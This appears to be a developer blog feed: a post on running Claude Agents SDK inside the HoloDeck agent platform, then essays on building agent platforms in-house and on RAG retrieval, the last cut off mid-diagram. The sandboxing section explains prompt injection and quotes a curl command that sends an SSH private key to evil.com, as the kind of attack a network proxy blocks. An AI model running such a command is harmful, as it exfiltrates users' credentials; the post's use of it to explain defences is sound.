I've spent months building HoloDeck — a no-code agent platform where you define agents, tools, evaluations, and deployments in pure YAML. It supports OpenAI, Azure, Ollama via Semantic Kernel. And as of v0.5.0, it supports Claude Agents SDK as a first-class backend.

Now, here's a hot take: after building both backends side by side, I'm convinced Claude Agents SDK is the only agent framework most developers actually need.

If you read my previous post on bash/filesystem-based agentic systems, you already know I'm a fan of agents that work with your tools, not agents that try to replace them. Claude Agents SDK nails this. It gives you a process with bash, file I/O, MCP tool access, extended thinking, and structured output — out of the box.

Why Claude Agents SDK
How HoloDeck Runs Claude Under the Hood
The Bridges and Adapters I Built
Custom Tools Are Just MCP Servers
What's Supported Today
Security: Sandboxing and Secure Deployment
Using Claude Agents SDK Without an Anthropic API Key
Auth: Local Experimentation vs Production
What's Coming Next
Wrapping Up

Why Claude Agents SDK

Most agent frameworks give you a library. You import classes, wire up chains, manage state, and pray that your tool-calling loop doesn't hit an edge case.

Claude Agents SDK gives you a process. An actual subprocess that:

Has bash access (configurable, with excluded commands)
Can read, write, and edit files
Runs MCP tools natively
Supports extended thinking (deep reasoning with token budgets)
Returns structured output validated against JSON schemas
Manages multi-turn sessions with conversation continuity
Supports subagents for parallel task execution

This isn't "here's an LLM wrapper with tool use." This is "here's an autonomous coding agent you can point at any problem." The same engine that powers Claude Code, now available as an SDK.

In my previous post, I talked about how bash + filesystem is the real agentic memory layer — not some vector database, not some custom state manager. Claude Agents SDK is the natural evolution of that idea. The agent is a process. Its memory is the filesystem. Its tools are MCP servers.

How HoloDeck Runs Claude Under the Hood

HoloDeck doesn't wrap Claude in some brittle API adapter. It spawns the Claude Agent SDK as a separate Node.js subprocess , then communicates via a structured message protocol. Think of it like running a very smart CLI tool — you send a prompt in, you get structured messages back.

Here's the architecture:

┌──────────────────────────────────────────────────────────────────┐
│                    HoloDeck (Python process)                     │
│                                                                  │
│ ┌───────────────┐  ┌───────────────┐  ┌─────────────────────┐    │
│ │ holodeck test │  │ holodeck chat │  │ holodeck serve (SK) │    │
│ │  (TestExec)   │  │  (ChatSess)   │  │   (future Claude)   │    │
│ └───────────────┘  └───────────────┘  └─────────────────────┘    │
│        │                │                                        │
│        ▼                ▼                                        │
│ ┌─────────────────────────────────────────────────────┐          │
│ │                   BackendSelector                   │          │
│ │ provider: anthropic ────────────────► ClaudeBackend │          │
│ │ provider: openai / azure / ollama ──► SKBackend     │          │
│ └─────────────────────────────────────────────────────┘          │
│                         │                                        │
│                         ▼                                        │
│ ┌──────────────────────────────────────────────────────────────┐ │
│ │                   ClaudeBackend                              │ │
│ │                                                              │ │
│ │ ┌───────────────┐  ┌─────────────┐  ┌──────────────────────┐ │ │
│ │ │ Tool Adapters │  │ MCP Bridge  │  │    OTel Bridge       │ │ │
│ │ │ (in-process   │  │ (external   │  │ (env var translator) │ │ │
│ │ │  MCP server)  │  │  MCP stdio) │  │                      │ │ │
│ │ └───────────────┘  └─────────────┘  └──────────────────────┘ │ │
│ │        │                │                                    │ │
│ │        ▼                ▼                                    │ │
│ │ ┌────────────────────────────────────────────────────┐       │ │
│ │ │ ClaudeAgentOptions                                 │       │ │
│ │ │ {model, system_prompt, mcp_servers, env,           │       │ │
│ │ │  permission_mode, max_turns, allowed_tools, ...}   │       │ │
│ │ └────────────────────────────────────────────────────┘       │ │
│ └──────────────────────────────────────────────────────────────┘ │
└──────────────────────────────────────────────────────────────────┘
                              │
           stdin: AsyncGenerator[prompt]
           stdout: AssistantMessage | UserMessage | ResultMessage
                              │
                              ▼
┌────────────────────────────────────────────────────────┐
│        Claude Agent SDK (Node.js subprocess)           │
│                                                        │
│ ┌────────────────────────────────────────────────────┐ │
│ │ Claude Model (sonnet, opus, haiku, etc.)           │ │
│ │                                                    │ │
│ │ Tools:                                             │ │
│ │  ├── holodeck_tools (in-process MCP server)        │ │
│ │  │    ├── vectorstore_search                       │ │
│ │  │    └── hierarchical_doc_search                  │ │
│ │  ├── external MCP servers (stdio transport)        │ │
│ │  ├── bash (configurable, with excluded commands)   │ │
│ │  ├── file read/write/edit (toggleable)             │ │
│ │  └── web search (optional)                         │ │
│ └────────────────────────────────────────────────────┘ │
└────────────────────────────────────────────────────────┘

The key insight: the Claude subprocess manages its own tool loop. HoloDeck doesn't manually orchestrate "call LLM → parse tool call → execute tool → feed result back." The SDK does all of that internally. HoloDeck's job is to:

Assemble the right configuration (tools, auth, observability, system prompt)
Send the prompt in
Collect the structured results coming back

This is fundamentally simpler than the Semantic Kernel path where you have to manage ChatHistory, tool plugins, function call routing, and all the plumbing yourself.

The Bridges and Adapters I Built

To make HoloDeck's existing tools and infrastructure work seamlessly with Claude Agents SDK, I built three bridge layers.

Tool Adapters (`tool_adapters.py`)

HoloDeck has rich tool implementations — VectorStoreTool for semantic search, HierarchicalDocumentTool for structure-aware document retrieval with contextual embeddings, hierarchy tracking, and hybrid search. These are Python objects with initialized connections to vector databases, embedding models, and keyword indexes.

The tool adapters wrap these live Python tool instances as an in-process MCP server that the Claude subprocess can invoke. Each adapter creates @tool-decorated handler functions with proper JSON schemas, then bundles them into a McpSdkServerConfig.

VectorStoreTool (Python, initialized with vector DB connection)
        │
        ▼
VectorStoreToolAdapter.to_sdk_tool()
        │
        ▼
@tool("vectorstore_search", schema={...})
async def search(query: str, top_k: int) -> str:
    return await tool_instance.search(query, top_k)
        │
        ▼
build_holodeck_sdk_server()
        │
        ▼
McpSdkServerConfig(name="holodeck_tools", tools=[...])
        │
        ▼
Registered as mcp_servers["holodeck_tools"] in ClaudeAgentOptions

One subtle but critical detail I had to figure out: the prompt must be sent as an AsyncGenerator — not a plain string — to keep stdin open for bidirectional MCP communication. A string prompt closes stdin immediately, which kills the in-process MCP server's ability to respond. I learned this the hard way after debugging a ProcessTransport error for way too long.

MCP Bridge (`mcp_bridge.py`)

HoloDeck users configure external MCP tools in YAML — database servers, API connectors, custom tooling, whatever. The MCP bridge translates HoloDeck's MCPTool config format into the McpStdioServerConfig TypedDicts that Claude Agents SDK expects.

It handles:

Three-level env var resolution: process env → .env file → explicit YAML overrides
${VAR} substitution in config values
JSON config blobs serialized into MCP_CONFIG env var for complex tool configuration
Transport filtering — Claude subprocess only supports stdio, so SSE/WebSocket/HTTP tools are skipped with a warning

OTel Bridge (`otel_bridge.py`)

HoloDeck has a comprehensive ObservabilityConfig Pydantic model for OpenTelemetry — traces, metrics, logs, the works. But the Claude subprocess runs as a separate process, so you can't pass spans or meters across the process boundary. The bridge translates the config into environment variables that the subprocess reads:

HoloDeck Config	Subprocess Env Var
`exporters.otlp.endpoint`	`OTEL_EXPORTER_OTLP_ENDPOINT`
`exporters.otlp.protocol`	`OTEL_EXPORTER_OTLP_PROTOCOL`
`traces.capture_content`	`OTEL_LOG_USER_PROMPTS` + `OTEL_LOG_TOOL_DETAILS`
`metrics.export_interval_ms`	`OTEL_METRIC_EXPORT_INTERVAL`
`metrics.enabled`	`OTEL_METRICS_EXPORTER` (`"otlp"` or `"none"`)

Privacy is default-safe — content capture is off unless explicitly enabled. Your prompts and tool details stay private by default.

Custom Tools Are Just MCP Servers

This is where the elegance of Claude Agents SDK really shines. When you build custom tools for the SDK, you're not learning some proprietary plugin API. You're building an MCP server.

That's it. Your tool is an MCP server. Claude knows how to call MCP servers. The tool gets a name, a JSON schema for its inputs, and a handler function. The SDK packages it as an internal MCP server that the Claude subprocess communicates with via the standard MCP protocol.

from claude_agent_sdk import tool, create_sdk_mcp_server

@tool(name="search_docs", description="Search documentation", schema={...})
async def search_docs(query: str, top_k: int = 5) -> str:
    results = await my_search_engine.search(query, top_k)
    return format_results(results)

server = create_sdk_mcp_server(name="my_tools", tools=[search_docs])

This means:

Tools are testable in isolation — they're just functions
Tools are reusable — any MCP client can call them
Tools compose naturally — multiple servers, each with their own tools
No framework lock-in — MCP is an open protocol

Compare this to Semantic Kernel where you need to create a KernelPlugin, register it with the kernel, handle the FunctionCallContent types, and manage the invocation lifecycle yourself. With Claude Agents SDK, you decorate a function and you're done.

What's Supported Today

As of HoloDeck v0.5.0, here's what works with provider: anthropic:

Core Features

holodeck test — Run your eval suite against Claude agents. Each test case is a stateless invoke_once() call with full evaluation metrics (BLEU, ROUGE, G-Eval, RAG faithfulness, etc.)
holodeck chat — Interactive multi-turn chat with streaming. Token-by-token output with a spinner until the first chunk arrives. Session continuity via session_id.
HoloDeck tools as native Claude SDK tools — VectorStoreTool and HierarchicalDocumentTool work seamlessly through the in-process MCP adapter. The agent calls them just like any other tool.
Structured outputs — Configure a JSON schema (inline or file path) and the response is validated at startup and at inference time. Invalid schemas fail fast.
Custom system prompts — Your instructions (file or inline) become the Claude subprocess's system_prompt. Full control over agent behavior.
OpenTelemetry — Full observability pipeline. Traces, metrics, and logs forwarded to your OTLP collector through the OTel bridge.
OAuth token auth — Use auth_provider: oauth_token for local development with your Claude Code credentials.

Claude-Specific Capabilities

Extended thinking with configurable token budgets (1,000-100,000 tokens)
Built-in web search
Bash execution with excluded command lists
File system access (read/write/edit individually toggleable)
Subagent execution (1-16 parallel)
Permission modes (manual, acceptEdits, acceptAll)
Max turns limit with automatic detection
5 auth providers: api_key, oauth_token, bedrock, vertex, foundry

Security: Sandboxing and Secure Deployment

Here's the part where most "just use the API" agent frameworks hand-wave. Claude Agents SDK actually ships with serious, layered security — and if you're running agents that can execute bash commands and write files, you need this.

The Threat Model

Agents aren't traditional software that follows predetermined code paths. They generate actions dynamically based on context. That means they can be influenced by the content they process — files, web pages, user input. This is prompt injection, and it's a real risk when your agent has bash and file access.

The good news: Claude's latest models are among the most robust frontier models against prompt injection. But defense in depth is still good practice.

Built-in Sandboxing

Claude Agents SDK includes a sandboxed bash tool that enforces OS-level isolation — not just "we check the command string," but actual kernel-level enforcement:

macOS : Uses Apple's Seatbelt framework
Linux : Uses bubblewrap for namespace-based isolation
Windows (WSL2): Uses bubblewrap, same as Linux. WSL1 is not supported (requires kernel features only available in WSL2). Native Windows sandboxing is planned but not yet available.
Network isolation : All network access goes through a proxy — domain allowlists, not blocklists

┌─────────────────────────────────────────────────┐
│               Agent Sandbox                     │
│                                                 │
│ ┌─────────────────┐  ┌────────────────────────┐ │
│ │ Filesystem      │  │ Network (proxy-gated)  │ │
│ │ • CWD: r/w      │  │ • Only allowed domains │ │
│ │ • Rest: r/o     │  │ • All traffic proxied  │ │
│ │ • Denied dirs   │  │ • No direct egress     │ │
│ └─────────────────┘  └────────────────────────┘ │
│                                                 │
│ OS-level enforcement (Seatbelt / bubblewrap)    │
│ All child processes inherit restrictions        │
└─────────────────────────────────────────────────┘

This means even if an attacker successfully injects a prompt that tricks the agent into running curl evil.com/exfil?data=$(cat ~/.ssh/id_rsa), the network proxy blocks it. The agent literally cannot reach domains that aren't on the allowlist.

Configuring the Sandbox Programmatically

The SDK exposes all of this as a SandboxSettings TypedDict you can pass directly in your agent options:

from claude_code_sdk import SandboxSettings

sandbox_settings: SandboxSettings = {
    "enabled": True,
    # Auto-approve bash commands when sandboxed — no more approval fatigue
    "autoAllowBashIfSandboxed": True,
    # Commands that must run outside the sandbox (they use the normal permission flow)
    "excludedCommands": ["docker", "git push"],
    # Block the escape hatch — all commands MUST run sandboxed
    "allowUnsandboxedCommands": False,
    "network": {
        # Only these Unix sockets are accessible
        "allowUnixSockets": ["/var/run/docker.sock"],
        # Allow binding to localhost ports (for dev servers, etc.)
        "allowLocalBinding": True
    },
    # For running inside unprivileged Docker (weaker security, use with caution)
    "enableWeakerNestedSandbox": False,
}

The key fields:

Field	Default	What it does
`enabled`	`False`	Turn on OS-level bash sandboxing
`autoAllowBashIfSandboxed`	`True`	Skip permission prompts for sandboxed commands
`excludedCommands`	`[]`	Commands that run outside the sandbox (e.g., `docker`, `git`)
`allowUnsandboxedCommands`	`True`	Allow `dangerouslyDisableSandbox` escape hatch. Set to `False` for strict mode.
`network.allowUnixSockets`	`[]`	Unix sockets accessible from within the sandbox
`network.allowLocalBinding`	`False`	Allow processes to bind to localhost ports
`enableWeakerNestedSandbox`	`False`	Linux-only: weaker sandbox for unprivileged Docker. Reduces security significantly.

The autoAllowBashIfSandboxed flag is particularly nice for CI/CD and automated testing. Instead of the agent asking for permission on every ls, grep, and cat, sandboxed commands just run. But if the command tries to reach a blocked domain or write outside the sandbox, it fails at the OS level — no prompt needed, just a hard block.

Setting allowUnsandboxedCommands: False is the strict mode. It completely disables the dangerouslyDisableSandbox escape hatch, forcing every bash command to run inside the sandbox. Combined with excludedCommands for the handful of tools that genuinely can't be sandboxed (like Docker), this gives you a tight security posture.

Production Hardening

For production deployments, Anthropic's secure deployment guide lays out a serious defense-in-depth strategy:

Container isolation with zero network:

docker run \
  --cap-drop ALL \
  --security-opt no-new-privileges \
  --read-only \
  --network none \
  --memory 2g \
  --pids-limit 100 \
  --user 1000:1000 \
  -v /path/to/code:/workspace:ro \
  -v /var/run/proxy.sock:/var/run/proxy.sock:ro \
  agent-image

The --network none flag removes all network interfaces. The only way out is through a Unix socket connected to a proxy running on the host. That proxy enforces domain allowlists, injects credentials, and logs everything.

The proxy pattern for credentials is particularly elegant. Instead of giving the agent an API key, you run a proxy outside the agent's security boundary that injects credentials into outgoing requests. The agent makes requests without credentials → the proxy adds them → forwards to the destination. The agent never sees the actual secrets.

Isolation technology options:

Technology	Isolation Strength	Overhead	Use Case
Sandbox runtime	Good	Very low	Local dev, CI/CD
Docker + `--network none`	Setup dependent	Low	Standard deployment
gVisor (`runsc`)	Excellent	Medium-High	Multi-tenant, untrusted content
Firecracker VMs	Excellent	High	Maximum isolation

What HoloDeck Does Today

HoloDeck's ClaudeBackend already implements several security practices:

Pre-flight validators catch misconfigurations before the subprocess starts (missing Node.js, invalid credentials, embedding provider mismatches, working directory collisions with existing CLAUDE.md files)
Credential injection via subprocess env vars — auth tokens are scoped to the subprocess, not global
Permission mode mapping — acceptEdits and acceptAll are escalated to bypassPermissions only in test mode (non-interactive automation). In chat mode, the configured permission level is respected.
Tool allowlists via claude.allowed_tools — explicitly restrict which MCP tools the agent can invoke

The sandboxing and proxy patterns from the SDK docs will naturally compose with HoloDeck's deployment pipeline (holodeck deploy) once we add Claude backend support to holodeck serve.

Using Claude Agents SDK Without an Anthropic API Key

Here's something most people don't realize: the Claude Agents SDK doesn't have to talk to Anthropic's servers. It speaks the Anthropic API protocol, and any endpoint that implements that protocol works. Ollama does exactly this — it exposes an Anthropic-compatible endpoint that the SDK can talk to natively.

As documented in the Ollama integration guide, you can point the SDK at a local Ollama instance by setting ANTHROPIC_BASE_URL:

export ANTHROPIC_BASE_URL=http://localhost:11434

To be clear: the SDK does not support OpenAI-compatible endpoints. It speaks the Anthropic Messages API. Ollama works because Ollama implemented the Anthropic API format on their side. Any provider that does the same (or any proxy that translates to it) will work too.

This means you can experiment with the Claude Agents SDK tooling, MCP integration, and agent patterns using local models — completely free, completely offline. The SDK's tool-calling loop, structured output, and session management all work the same way regardless of what's behind the endpoint.

Obviously you won't get Claude-level reasoning from a local 7B model, but for testing tool integration, MCP server development, and agent workflow design, it's perfectly usable.

Auth: Local Experimentation vs Production

One of the friction points with agent SDKs is authentication. Claude Agents SDK makes this surprisingly painless for local development.

As Thariq pointed out on X, using your CLAUDE_CODE_OAUTH_TOKEN for local experimentation is actually allowed. This means if you have Claude Code installed and authenticated, you can build and test custom agents without setting up a separate API key.

In HoloDeck, this is a simple YAML toggle:

model:
  provider: anthropic
  name: claude-sonnet-4-20250514
  auth_provider: oauth_token # Uses CLAUDE_CODE_OAUTH_TOKEN

However — and this is important — when you ship these agents to production, you must use an Anthropic API key. The OAuth token is tied to your personal Claude Code session. It's not meant for server-side deployment.

For production:

model:
  provider: anthropic
  name: claude-sonnet-4-20250514
  auth_provider: api_key # Uses ANTHROPIC_API_KEY

Or if you're running through a cloud provider:

model:
  provider: anthropic
  name: claude-sonnet-4-20250514
  auth_provider: bedrock # or vertex, foundry

HoloDeck's validators check for the right credentials at startup and inject them into the subprocess environment, so you get a clear error if something's misconfigured rather than a cryptic 401 at inference time.

What's Coming Next

HoloDeck v0.5.0 is the foundation. Here's what we're building on top of it:

Hooks

Claude Agents SDK supports hooks — shell commands that execute in response to agent events (tool calls, message sends, etc.). We'll expose these as YAML config so you can add pre/post processing, logging, or validation to any agent action without writing code.

Agent Skills

Skills are reusable prompt-based capabilities that can be invoked by name. Think of them as composable building blocks — a "summarize" skill, a "code-review" skill, a "translate" skill — that agents can mix and match.

Subagents (Multi-Agent Swarms)

The SDK already supports parallel subagent execution. We'll expose this as a YAML pattern where you define a coordinator agent that spawns specialized worker agents. Swarm-style orchestration, configured in YAML.

`holodeck serve` for Claude Agents

Right now, holodeck serve only works with Semantic Kernel backends. We're adding Claude agent support so you can expose any provider: anthropic agent as an HTTP API endpoint — same REST interface, same AG-UI compliance.

`holodeck deploy` with Claude

Once serve supports Claude, deploy naturally follows. The deployment pipeline (Dockerfile generation, container build, cloud push) will use serve as the entrypoint into the container. You just swap the provider in your YAML and the container runs a Claude agent instead of an SK agent — with all the security hardening options from the SDK baked in.

Human-in-the-Loop Approvals

By combining permission_mode: manual (or acceptEdits) with hooks, you can build approval workflows where the agent pauses and waits for human confirmation before taking sensitive actions. Think: "the agent wants to run DELETE FROM users — approve or deny?"

Custom Anthropic Endpoints

Full support for routing through cloud providers — AWS Bedrock, Google Vertex AI, Azure Foundry — plus custom ANTHROPIC_BASE_URL for self-hosted endpoints and Ollama. Run the same agent YAML against any compatible backend.

Wrapping Up

I started building HoloDeck as a multi-backend platform because I thought you needed choice. And you do — for the transition period. But after building the Claude Agents SDK integration, I'm increasingly convinced it's the only agent runtime most teams need.

It's a process, not a library. It manages its own tool loop. It speaks MCP natively. It has bash, file I/O, extended thinking, structured output, and subagents built in. It ships with real sandboxing — OS-level enforcement, not just string matching on commands. And you can run it locally with Ollama if you want to experiment without an API key.

The Semantic Kernel backend isn't going anywhere — it powers OpenAI and Azure workloads and that's still valuable. But for new agents? I'd start with Claude Agents SDK every time.

If you're building agents today, stop gluing together LangChain chains or wrestling with AutoGen graphs. Just define your agent in YAML, point it at Claude, and let the SDK do what it does best.

name: my-agent
model:
  provider: anthropic
  name: claude-sonnet-4-20250514
  auth_provider: oauth_token
instructions:
  inline: "You are a helpful assistant."
claude:
  bash:
    enabled: true
  file_system:
    read: true
    write: true
  max_turns: 10

That's it. That's the whole framework.

Check out HoloDeck on GitHub and the Claude Agent SDK docs to get started.

Take Back the Stack. Your Cloud Provider Doesn't Want You To.

Jeremiah Justin Barias — Sun, 08 Feb 2026 00:00:00 +0000

Take Back the Stack. Your Cloud Provider Doesn't Want You To.

For the better part of a decade, I've watched organisations — hand over layer after layer of their engineering stack to cloud providers. And every single time, the justification was the same: "We don't have the skills to build this ourselves." Infrastructure? Outsource it. Platforms? Managed service. Data pipelines? Let AWS handle it. ML? Definitely outsource that.

And now it's happening again with AI agents. Azure has AI Foundry. AWS has Bedrock and AgentCore. Google has Vertex AI Engine. The pitch is identical to every pitch before it: "Don't build this. Consume ours. We'll handle the hard parts."

I'm tired of it. And for the first time, I think the excuse — "we can't build it ourselves" — is actually, provably, wrong.

How We Got Here

I get it. The outsourcing made sense for a long time. Running data centres was expensive and painful. Managing Kubernetes at scale required a team most organisations couldn't hire. Building ML pipelines from scratch was a PhD-level exercise.

So we moved to the cloud. Then we moved to managed services on the cloud. Then we moved to managed AI services on the cloud. Each step was rational. Each step also meant we understood less and less about our own systems.

The progression looked something like:

"We can't run data centres." Fair enough. "We can't manage Kubernetes." OK, sure. "We can't build ML pipelines." Debatable, but fine. "We can't build AI agents." Hang on.

That last one is where I draw the line. Because the thing that changed — the thing that most organisations haven't fully clocked yet — is that building software just got mass-democratised in a way that makes most of those "we can't" excuses evaporate.

The Agent Platform Gold Rush (And Why You Should Be Suspicious)

Every major cloud provider is now racing to become the platform where your AI agents live. Let me spell out what that actually means.

Azure AI Foundry — model catalogue, prompt management, agent orchestration, evaluation tooling. All inside Azure. All wired into Azure services. All making it progressively harder to leave Azure.

AWS Bedrock AgentCore — same play, different logo. Build your agents on AWS, connect them to your AWS data, orchestrate them with AWS primitives. Your agents become structurally dependent on AWS. That's not a bug; that's their business model.

Google Vertex AI Engine — you see where this is going.

Here's what bugs me. These aren't just hosting platforms. They're becoming the control plane for your AI strategy. They decide what models you can use, how your agents are orchestrated, what telemetry you get, how your data flows. And once you've wired fifty agents into their proprietary service mesh, your switching costs aren't just high — they're existential.

For a startup? Fine. Use the managed thing. Ship fast, worry about lock-in later. But if you're a large enterprise, a government agency, any organisation where your value comes from the systems you build and the data you hold — you're handing over the keys. Again.

For organisations that need to meet regulatory requirements, and government institutions that need to consider who their service providers are -- THIS IS A MATERIAL RISK.

Something Changed and Most People Missed It

While the cloud providers were building their agent hosting empires, something happened that completely rewrites the economics here.

Claude Code. Codex. Cursor. Cline. Aider. Pick your flavour.

These aren't your 2023 Copilot autocomplete toys. These are agentic coding assistants that build entire systems. They reason about architecture. They scaffold applications. They debug, refactor, write tests, and iterate across entire codebases. I've been using Claude Code daily for months and it still catches me off guard how much it can do.

Tasks that would've taken me a week — standing up a new service, wiring an API integration, building a deployment pipeline — now take an afternoon. Not because I'm cutting corners. Because the AI is doing 80% of the mechanical work and I'm doing the 20% that actually requires a brain: the architecture decisions, the domain logic, the "wait, that edge case will blow up in production" judgment calls.

And this is the part that matters: the reason we outsourced all those engineering layers was because building them in-house was expensive. You needed big teams. Deep expertise across a dozen domains. Months of runway.

What if that's not true anymore?

You Don't Need a 10x Team. You Might Need Three People.

I'm going to say something that'll annoy some people: the era of needing ten-person platform teams to build internal tooling is over. Or at the very least, the bar has dropped dramatically.

A single engineer who knows their domain and knows how to drive an AI coding assistant can now:

Scaffold infrastructure-as-code for an entire deployment pipeline in a day
Build a custom agent orchestration layer that's tailored to your actual needs
Write, test, and ship services at a pace that would've required a team of five
Automate the operational drudgery that used to eat an entire SRE team's week

I'm not saying fire your engineers, far from it. I'm saying the shape of the team changes. You don't need ten people doing ten things. You need two or three people who deeply understand your organisation, your architecture, and your constraints — and who can use AI to move at a pace that wasn't physically possible before 2024.

This is especially true for the kind of work that cloud providers want you to outsource. Agent orchestration? Pattern-heavy glue code. AI agents eat that for breakfast. Data pipeline wiring? Same. Deployment automation? Same. All the stuff that used to justify a managed service because "we don't have the headcount" — your headcount just got a 5x multiplier.

Some may say that outsourcing all these to an AI Agent provided by an AI lab could be a material risk as well, and that's a fair point. But using AI coding agents to build your own internal platforms is a fundamentally different proposition than outsourcing your entire agent strategy to a third-party service. The former is about augmenting your internal capabilities, while the latter is about relinquishing control.

Stop Letting IT Gatekeep Developer Platforms

OK, here's where I'm really going to step on some toes.

If you're a large organisation thinking about this, your instinct is going to be: "Let's get IT to build a centralised platform." Don't. Please.

I've lived through this movie. IT builds a "developer portal" (if you're lucky) that's actually a ticket queue with a React frontend. Need an environment? Raise a ticket. Need a database? Another ticket. Need a deployment slot? Ticket, two-week SLA, hope you weren't trying to ship something this quarter. By the time you're actually writing code, the business has moved on and someone's asking why "digital transformation" isn't delivering results.

The starting point should be building real developer platforms. Self-service. Automated. Opinionated where it matters, flexible where it doesn't. And here's the kicker — only developers will build what developers actually need.

Platform engineering is not an IT governance function. It's a software engineering discipline. The people building your internal platform need to be people who feel the pain of not having one. People who've waited three weeks for a staging environment and thought "I could build a better system than this in a weekend." With AI coding assistants, that thought is now literally true.

Give a small, empowered team — even one or two devs — the mandate to build internal tooling. Give them Claude Code. Give them autonomy. Get IT out of the critical path for day-to-day development. Watch what happens.

Build the Moat Around What Actually Matters

Here's the mental model I keep coming back to.

Your organisation's moat is not its cloud infrastructure. It never was. Nobody ever won a competitive advantage because they had a really nice Kubernetes cluster. Your moat is your domain knowledge. Your data. Your processes. The software that encodes all of that into systems that work.

Cloud infrastructure — provisioning VMs, managing databases, configuring load balancers — that's commodity toil. Important, but undifferentiated. It's exactly the kind of work AI agents are already good at handling.

So here's what I think the play is:

Delegate the infrastructure toil to AI agents. Use agentic coding assistants to automate your cloud operations. Let machines manage machines. This is what they're good at.

Build your agent platforms in-house. Don't hand your agent orchestration to AI Foundry or Bedrock AgentCore. Use Claude Code to build your own. With one or two engineers driving AI, this is genuinely achievable now — and the result will be tailored to your domain, wired into your data, and owned by you. Not rented.

Spend your human engineering effort on what's actually unique to you. The domain logic. The data models. The regulatory knowledge. The workflows that make your organisation yours. That's where engineers should be thinking, not fighting YAML configs for a managed service that doesn't quite do what you need.

I'm not anti-cloud. I'm not suggesting anyone go rack servers. Use cloud compute, managed databases, managed networking — consume the commodity layers, absolutely. But stop outsourcing the intelligence layer. Stop letting cloud providers become the operating system for your AI strategy. The tools to take it back exist today, right now, and the cost of doing it yourself just dropped by an order of magnitude.

The Risk of Waiting

Some organisations will read this and think "we're not ready." They'll wait. They'll commission a strategy paper. They'll form a committee. They'll wait for IT to assess the tools. They'll wait for a vendor to package it all up in a nice procurement-friendly bundle.

And while they wait, they'll outsource the last engineering layers they had. They'll become fully dependent on platforms they don't understand, built by companies whose incentive is to keep them dependent for shareholder value. And when the pricing changes — and it always changes — they'll have zero internal capability to respond.

The organisations that start now, even messily, even with a tiny team, even with imperfect first attempts — they'll build the muscle memory that matters. They'll discover that two engineers with AI coding assistants can build things that would have required twenty people three years ago.

The cloud providers are betting you won't build. That the complexity will scare you off. That you'll keep paying rent on their platforms because it feels safer than trying.

I think they're wrong. And I think more engineers are starting to feel the same way.

If you want to see what building these patterns looks like in practice, check out HoloDeck — it's my open-source agent experimentation platform where I'm putting my money where my mouth is.

RAG Is Dead. Long Live RAG. Or Is It?

Jeremiah Justin Barias — Sat, 07 Feb 2026 00:00:00 +0000

Heads up: this is a long one. Grab a coffee.

There's a running joke in the AI engineering community: every six months, someone publishes a post declaring RAG dead. And every six months, the rest of us are still building retrieval pipelines, because the alternative — cramming a million pages into a context window and praying — doesn't actually work.

So let me add to the pile. RAG is dead. Long live RAG. Or is it?

Welcome to this rabbit hole.

What we're covering

The Great Vector Gold Rush of 2023 (and why it mostly didn't work)
GraphRAG's brief moment in the sun
The Anthropic blog post that rewired my brain
How I turned that into a tool for 800-page legislation (with reranking)
Why structured data gets left out of every RAG conversation
The agentic shift happening right now
The information retrieval problem nobody actually solved

The Great Vector Gold Rush

Cast your mind back to 2023. ChatGPT had just lit the world on fire and suddenly every database vendor on the planet had a vector announcement to make. Postgres got pgvector. Redis added vector similarity. Elasticsearch, MongoDB, Supabase — everyone scrambled to bolt on approximate nearest neighbour search like it was the new JSON column.

And enterprise teams took the bait. The playbook was dead simple:

Take your documents
Chunk them naively (every 500 tokens, maybe with some overlap)
Embed them with text-embedding-ada-002
Stuff them into a vector store
Wire up a chatbot
Ship it. Call it "AI-powered knowledge management"

Sound familiar? Yeah. Everyone did this.

I watched it play out firsthand. Business teams at my organisation (I work for the Federal Government) would come to us, exasperated:

"We tried using Copilot with SharePoint. We even ingested everything into Dataverse. It can't seem to understand PDFs with tables! Also it hallucinated like nobody's business. Precision and recall scores were abysmal. The whole thing turned into unusable slop."

The frustration was real. The promise of "just ask your documents anything" crumbled the moment you needed an actual correct answer from an 800-page piece of legislation. And the root cause was always the same: nobody was taking the information retrieval problem seriously.

They were treating retrieval as a checkbox — "we have a vector store, done" — when it's actually the hardest part of the whole pipeline.

GraphRAG and the Hype That Fizzled

Then came GraphRAG. Microsoft Research published a paper, the community got excited, and suddenly everyone was building knowledge graphs out of their document corpora. The idea had elegance: model entities and relationships explicitly, then traverse the graph during retrieval to capture multi-hop reasoning.

In practice? The extraction was brittle. The graphs were noisy. The latency was punishing. And for most use cases — "find me the section about reporting requirements in this regulation" — a well-built keyword index would have done the job in milliseconds.

GraphRAG didn't die, exactly. It found its niche in certain analytical workloads. But as a general-purpose retrieval upgrade for enterprise document search? It fizzled. The gap between research demo and production system was a chasm.

The Blog Post That Changed Everything (For Me)

In late 2024, Anthropic's engineering team quietly published a blog post called Contextual Retrieval. No fanfare. No "paradigm shift" language. Just a straightforward technique that made me stop what I was doing and redesign an entire tool.

The core insight is embarrassingly simple: when you chunk a document, you destroy context. So put the context back before you embed.

Here's what I mean. Traditional RAG takes a chunk like "The Administrator shall submit a report within 30 days" and embeds it in isolation. Which administrator? Which report? 30 days from what? The chunk lost all of that when it got ripped out of the document.

Contextual Retrieval takes the same chunk and prepends a short, LLM-generated summary of where it sits in the document: "This chunk is from Title IV, Chapter 2, Section 403(b) of the Clean Air Act, which covers administrative reporting requirements." Then you embed the whole thing.

That's it. That's the technique.

The Pipeline

Let me draw it out, because this is where it gets interesting — Anthropic doesn't just add context to embeddings. They build a hybrid index that combines vector search and BM25 keyword search, blended with Reciprocal Rank Fusion. The full pipeline looks like this:

═══════════════════════════════════════════════════════════════════════
  CONTEXTUAL RETRIEVAL PIPELINE (Anthropic)
═══════════════════════════════════════════════════════════════════════

  INDEXING PHASE
  ──────────────

  Full Document
       │
       ▼
  ┌─────────────────────────────────────┐
  │          Chunk Document             │
  │  (split into semantic chunks)       │
  └──────────────────┬──────────────────┘
                     │
          ┌──────────┴──────────┐
          │  For each chunk...  │
          ▼                     ▼
  ┌───────────────┐    ┌────────────────────────────┐
  │  Raw Chunk    │    │  Full Document + Chunk      │
  │               │───▶│         ↓                   │
  │  "The Admin   │    │  LLM generates context:     │
  │   shall       │    │  "This chunk is from        │
  │   submit a    │    │   Section 403(b) of the     │
  │   report      │    │   Clean Air Act, Title IV,  │
  │   within      │    │   covering administrative   │
  │   30 days"    │    │   reporting requirements."  │
  │               │    └─────────────┬──────────────┘
  └───────────────┘                  │
                                     ▼
                     ┌───────────────────────────────┐
                     │     Contextualized Chunk       │
                     │  "Section 403(b), Clean Air    │
                     │   Act, Title IV, admin         │
                     │   reporting. The Admin shall   │
                     │   submit a report within       │
                     │   30 days"                     │
                     └───────────────┬───────────────┘
                                     │
